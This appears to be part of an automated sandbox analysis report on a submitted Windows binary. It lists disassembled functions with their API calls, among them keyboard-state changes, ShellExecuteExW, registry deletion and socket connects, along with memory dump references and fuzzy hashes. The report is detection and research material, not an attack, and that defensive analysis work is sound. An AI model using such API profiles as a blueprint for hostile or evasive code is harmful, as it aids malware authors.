                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00986246
                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00986257
                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0098902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00986291
                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 009862B1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                          • String ID:
                                          • API String ID: 3864802216-0
                                          • Opcode ID: b3b99463ac934e06f43f91cabcefeeb046a81f024badc4d48c61e82d5b898eb0
                                          • Instruction ID: d5c702b9463da333f6db225ce2d7af2171bafebea27add18701e114639b91fa2
                                          • Opcode Fuzzy Hash: b3b99463ac934e06f43f91cabcefeeb046a81f024badc4d48c61e82d5b898eb0
                                          • Instruction Fuzzy Hash: 02318B72214214BFEF109F10CC9AFEA3BADEF4A765F040065FE08DE292D6759841DB60
                                          Function 0095BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID:
                                          • API String ID: 2931989736-0
                                          • Opcode ID: b31b16ebec30039712b10da77bd17f438ba01d9b797d14512d902a207f720f26
                                          • Instruction ID: 74f752576f64bd35a470cab26abe5dc18f4c2817a07454087ee0193dbfbcbc0b
                                          • Opcode Fuzzy Hash: b31b16ebec30039712b10da77bd17f438ba01d9b797d14512d902a207f720f26
                                          • Instruction Fuzzy Hash: B72104616002157BAA04F71AED42FFB735C9EA138DF044021FD089624BEB64DE28C3E5
                                          Function 0096EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00909837: __itow.LIBCMT ref: 00909862
                                            • Part of subcall function 00909837: __swprintf.LIBCMT ref: 009098AC
                                            • Part of subcall function 0091FC86: _wcscpy.LIBCMT ref: 0091FCA9
                                          • _wcstok.LIBCMT ref: 0096EC94
                                          • _wcscpy.LIBCMT ref: 0096ED23
                                          • _memset.LIBCMT ref: 0096ED56
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                          • String ID: X
                                          • API String ID: 774024439-3081909835
                                          • Opcode ID: 7aba536f6fe738cd3ae46048bf5b281858ef82c865f5558cd8e0fe755d3f1c58
                                          • Instruction ID: 7d72d5eef3cec42f2b7400b882fd23f2fe9585b094ca0a9d0804d279d14c67a1
                                          • Opcode Fuzzy Hash: 7aba536f6fe738cd3ae46048bf5b281858ef82c865f5558cd8e0fe755d3f1c58
                                          • Instruction Fuzzy Hash: 25C16E755083019FC714EF64D895B6AB7E4FF85324F00892DF8999B2A2DB31EC45CB82
                                          Function 00976B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00976C00
                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00976C21
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00976C34
                                          • htons.WSOCK32(?,?,?,00000000,?), ref: 00976CEA
                                          • inet_ntoa.WSOCK32(?), ref: 00976CA7
                                            • Part of subcall function 0095A7E9: _strlen.LIBCMT ref: 0095A7F3
                                            • Part of subcall function 0095A7E9: _memmove.LIBCMT ref: 0095A815
                                          • _strlen.LIBCMT ref: 00976D44
                                          • _memmove.LIBCMT ref: 00976DAD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                          • String ID:
                                          • API String ID: 3619996494-0
                                          • Opcode ID: 0d5f3f93b48194f7e7432f088192c7ba87659f00295703ef594b697ac7bd2c0a
                                          • Instruction ID: 2661f200e88d3d36432f87699dc9834d3b8647b973882b0c25596ddb410a1aec
                                          • Opcode Fuzzy Hash: 0d5f3f93b48194f7e7432f088192c7ba87659f00295703ef594b697ac7bd2c0a
                                          • Instruction Fuzzy Hash: 0881B072208700AFD720EB24CC92F6BB7A8AFC5714F548A1DF9599B2D2DA70ED05CB51
                                          Function 00901424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 802cc8ff4ef162f96c789eab34d6060be3840fa818e05214af95480a1ea96112
                                          • Instruction ID: 368941e57125299a4ce3ed8323722cfa5309b7afe0ff4975d9ea650706c2abb3
                                          • Opcode Fuzzy Hash: 802cc8ff4ef162f96c789eab34d6060be3840fa818e05214af95480a1ea96112
                                          • Instruction Fuzzy Hash: 07715931904109EFCB15DF98CC89ABEBB79FF85314F248159F915AB2A1C734AA51CFA0
                                          Function 0098B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • IsWindow.USER32(01026608), ref: 0098B3EB
                                          • IsWindowEnabled.USER32(01026608), ref: 0098B3F7
                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0098B4DB
                                          • SendMessageW.USER32(01026608,000000B0,?,?), ref: 0098B512
                                          • IsDlgButtonChecked.USER32(?,?), ref: 0098B54F
                                          • GetWindowLongW.USER32(01026608,000000EC), ref: 0098B571
                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0098B589
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                          • String ID:
                                          • API String ID: 4072528602-0
                                          • Opcode ID: 06fc42abe21187b7d65ffb0878d975b193cb27f601331cd400d00c9de36107f1
                                          • Instruction ID: 3ed0ef9ed13c63d6570b28e5cd93171bdeed7a211d276d72d58bd5dfbcdaa6c8
                                          • Opcode Fuzzy Hash: 06fc42abe21187b7d65ffb0878d975b193cb27f601331cd400d00c9de36107f1
                                          • Instruction Fuzzy Hash: 5E71B034A05704EFDB20AF64C8A5FBA7BB9EF49300F184559F946973B2C735A980DB50
                                          Function 0097F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 0097F448
                                          • _memset.LIBCMT ref: 0097F511
                                          • ShellExecuteExW.SHELL32(?), ref: 0097F556
                                            • Part of subcall function 00909837: __itow.LIBCMT ref: 00909862
                                            • Part of subcall function 00909837: __swprintf.LIBCMT ref: 009098AC
                                            • Part of subcall function 0091FC86: _wcscpy.LIBCMT ref: 0091FCA9
                                          • GetProcessId.KERNEL32(00000000), ref: 0097F5CD
                                          • CloseHandle.KERNEL32(00000000), ref: 0097F5FC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                          • String ID: @
                                          • API String ID: 3522835683-2766056989
                                          • Opcode ID: 1eea41d2f97ec4451819e3a378f0b23af362e625d1a89442b437a7f67a185bd9
                                          • Instruction ID: 0c9682d9143a4e5f8cd195e1b0fc1f010aba300993c91898bc81927d0afe861c
                                          • Opcode Fuzzy Hash: 1eea41d2f97ec4451819e3a378f0b23af362e625d1a89442b437a7f67a185bd9
                                          • Instruction Fuzzy Hash: CA616EB5A006199FCB14DF64C495AAEBBF5FF89310F148469E859BB391CB30AD41CB90
                                          Function 00960F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetParent.USER32(?), ref: 00960F8C
                                          • GetKeyboardState.USER32(?), ref: 00960FA1
                                          • SetKeyboardState.USER32(?), ref: 00961002
                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00961030
                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 0096104F
                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00961095
                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 009610B8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: 2de8461da22dce88e014a4a17b961fa6ad0cc05adf65a7d7356115c8783796e2
                                          • Instruction ID: cef52c35953cf5d1eb3e9a53df9a96667c6225d294b99dae432941b96a44f15b
                                          • Opcode Fuzzy Hash: 2de8461da22dce88e014a4a17b961fa6ad0cc05adf65a7d7356115c8783796e2
                                          • Instruction Fuzzy Hash: 5D51D1A06087D53EFB3642348C55BBBBEAD5B46304F0C8989E1D4868D2D299ECD8D751
                                          Function 00960D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetParent.USER32(00000000), ref: 00960DA5
                                          • GetKeyboardState.USER32(?), ref: 00960DBA
                                          • SetKeyboardState.USER32(?), ref: 00960E1B
                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00960E47
                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00960E64
                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00960EA8
                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00960EC9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$Parent
                                          • String ID:
                                          • API String ID: 87235514-0
                                          • Opcode ID: f7e5e7cbf9c6cfc85366f9de14f8b09bd2c61b1f2b799dd70b5dff3034ac9767
                                          • Instruction ID: 4e6d7073d869a6c2198e4d19fe0371863b53b5431b74279af0d7e1eba36e9758
                                          • Opcode Fuzzy Hash: f7e5e7cbf9c6cfc85366f9de14f8b09bd2c61b1f2b799dd70b5dff3034ac9767
                                          • Instruction Fuzzy Hash: 3A5106A05487D53DFB3783748C95B7B7FAD6B86300F088989F1D4464C2D396AC98E750
                                          Function 009655FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _wcsncpy$LocalTime
                                          • String ID:
                                          • API String ID: 2945705084-0
                                          • Opcode ID: 136ca7768163ee2644d8df2efaa754ab0799a24186a41cf556eacaf937b3d55b
                                          • Instruction ID: 8e98ab44c1f41479200a05788503ab0fad650fc2bb150bf9f174e8518e22d1c3
                                          • Opcode Fuzzy Hash: 136ca7768163ee2644d8df2efaa754ab0799a24186a41cf556eacaf937b3d55b
                                          • Instruction Fuzzy Hash: AC41B365C1062476CB11EBB4DC86ACFB3BC9F45310F508966F518E3225FB34A285C7EA
                                          Function 00963671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0096466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00963697,?), ref: 0096468B
                                            • Part of subcall function 0096466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00963697,?), ref: 009646A4
                                          • lstrcmpiW.KERNEL32(?,?), ref: 009636B7
                                          • _wcscmp.LIBCMT ref: 009636D3
                                          • MoveFileW.KERNEL32(?,?), ref: 009636EB
                                          • _wcscat.LIBCMT ref: 00963733
                                          • SHFileOperationW.SHELL32(?), ref: 0096379F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                          • String ID: \*.*
                                          • API String ID: 1377345388-1173974218
                                          • Opcode ID: d489293ac6437bcea2c497a68bed465c19f18451710f1093c372f73f20f0b802
                                          • Instruction ID: 3c25fc205670609bc4a9d2112b9176814d7e429bd5d4382ea2af3db5d5f2e92e
                                          • Opcode Fuzzy Hash: d489293ac6437bcea2c497a68bed465c19f18451710f1093c372f73f20f0b802
                                          • Instruction Fuzzy Hash: C1416071508344AEC752EF64D442ADFB7ECEF89390F40492EB49AC3261EA34D689CB56
                                          Function 00987291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 009872AA
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00987351
                                          • IsMenu.USER32(?), ref: 00987369
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009873B1
                                          • DrawMenuBar.USER32 ref: 009873C4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                          • String ID: 0
                                          • API String ID: 3866635326-4108050209
                                          • Opcode ID: 2a347d082267079969a8e63a932310535403bb5aab98497b9228b1c8b3070fa4
                                          • Instruction ID: 64e487501f8b1ca94783b7a5cbe8cffe2025df0b6d2b9d34c28478c19d27f6c1
                                          • Opcode Fuzzy Hash: 2a347d082267079969a8e63a932310535403bb5aab98497b9228b1c8b3070fa4
                                          • Instruction Fuzzy Hash: 0E411875A04208AFDB20EF90E884EAABBF8FB45350F24952AFD1597360D730ED50EB51
                                          Function 00980FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00980FD4
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00980FFE
                                          • FreeLibrary.KERNEL32(00000000), ref: 009810B5
                                            • Part of subcall function 00980FA5: RegCloseKey.ADVAPI32(?), ref: 0098101B
                                            • Part of subcall function 00980FA5: FreeLibrary.KERNEL32(?), ref: 0098106D
                                            • Part of subcall function 00980FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00981090
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00981058
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                          • String ID:
                                          • API String ID: 395352322-0
                                          • Opcode ID: 02b5ccbfb4669e8276835110c778a81bec8d37e706f1b75c6ea2c41fd090fce7
                                          • Instruction ID: 8e7db6c910473861b5cace5c487b433db696c1a8ae76af51cb83268bd86c7185
                                          • Opcode Fuzzy Hash: 02b5ccbfb4669e8276835110c778a81bec8d37e706f1b75c6ea2c41fd090fce7
                                          • Instruction Fuzzy Hash: 0F310B71911109BFDB15AF90DC99EFFB7BCEF08300F10416AE501E2251EB749E8A9BA1
                                          Function 009862CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 009862EC
                                          • GetWindowLongW.USER32(01026608,000000F0), ref: 0098631F
                                          • GetWindowLongW.USER32(01026608,000000F0), ref: 00986354
                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00986386
                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009863B0
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 009863C1
                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009863DB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: LongWindow$MessageSend
                                          • String ID:
                                          • API String ID: 2178440468-0
                                          • Opcode ID: 292901920c30e4fb83430807354ea9ea1ff826a3aa9e1428585787d3d4db8c47
                                          • Instruction ID: 84c4c0d1258549a4345ff0c15020f903c6af73489df0b780bca5223138f00df3
                                          • Opcode Fuzzy Hash: 292901920c30e4fb83430807354ea9ea1ff826a3aa9e1428585787d3d4db8c47
                                          • Instruction Fuzzy Hash: DF311030618255AFDB219F18EC84F593BE5BB4A714F1902A9F5019F3B2CB71A880EB50
                                          Function 0095DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0095DB2E
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0095DB54
                                          • SysAllocString.OLEAUT32(00000000), ref: 0095DB57
                                          • SysAllocString.OLEAUT32(?), ref: 0095DB75
                                          • SysFreeString.OLEAUT32(?), ref: 0095DB7E
                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0095DBA3
                                          • SysAllocString.OLEAUT32(?), ref: 0095DBB1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                          • String ID:
                                          • API String ID: 3761583154-0
                                          • Opcode ID: f039d0285740c953a90a2c675e31a0fbba96252f823f95cd2838ae622d6a4d5a
                                          • Instruction ID: 972ea5606c14f994c17b95fbff5f7c469d93894a2f97785d67f35088e85165ef
                                          • Opcode Fuzzy Hash: f039d0285740c953a90a2c675e31a0fbba96252f823f95cd2838ae622d6a4d5a
                                          • Instruction Fuzzy Hash: BA21AE36605219AFEF20DFB9DC88CBB73ADEB08360B118536FD15DB2A0D6709C4597A0
                                          Function 00976173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00977D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00977DB6
                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009761C6
                                          • WSAGetLastError.WSOCK32(00000000), ref: 009761D5
                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0097620E
                                          • connect.WSOCK32(00000000,?,00000010), ref: 00976217
                                          • WSAGetLastError.WSOCK32 ref: 00976221
                                          • closesocket.WSOCK32(00000000), ref: 0097624A
                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00976263
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
